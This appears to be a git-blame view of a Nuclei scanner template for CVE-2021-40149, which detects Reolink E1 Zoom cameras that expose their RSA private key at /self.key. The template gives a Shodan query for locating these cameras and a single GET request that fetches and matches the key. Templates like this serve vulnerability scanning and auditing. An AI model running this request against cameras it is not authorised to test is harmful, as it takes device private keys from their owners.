2022-06-07 04:54:50 +00:00
|
|
|
id: CVE-2021-40149
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Reolink E1 Zoom Camera - Rsa Key Information Disclosure
|
|
|
|
author: For3stCo1d
|
|
|
|
severity: high
|
2022-06-07 10:02:51 +00:00
|
|
|
description: |
|
|
|
|
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key disclosure vulnerability.
|
2022-06-07 04:54:50 +00:00
|
|
|
reference:
|
|
|
|
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
|
|
|
|
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
|
2022-06-07 10:02:51 +00:00
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
|
2022-06-07 04:54:50 +00:00
|
|
|
metadata:
|
2022-06-07 10:02:51 +00:00
|
|
|
verified: true
|
2022-06-07 04:54:50 +00:00
|
|
|
shodan-query: http.title:"Reolink"
|
2022-06-07 10:02:51 +00:00
|
|
|
tags: cve,cve2021,reolink,camera,iot,exposure,unauth
|
2022-06-07 04:54:50 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/self.key"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "-----BEGIN RSA PRIVATE KEY-----"
|
|
|
|
- "-----END RSA PRIVATE KEY----"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|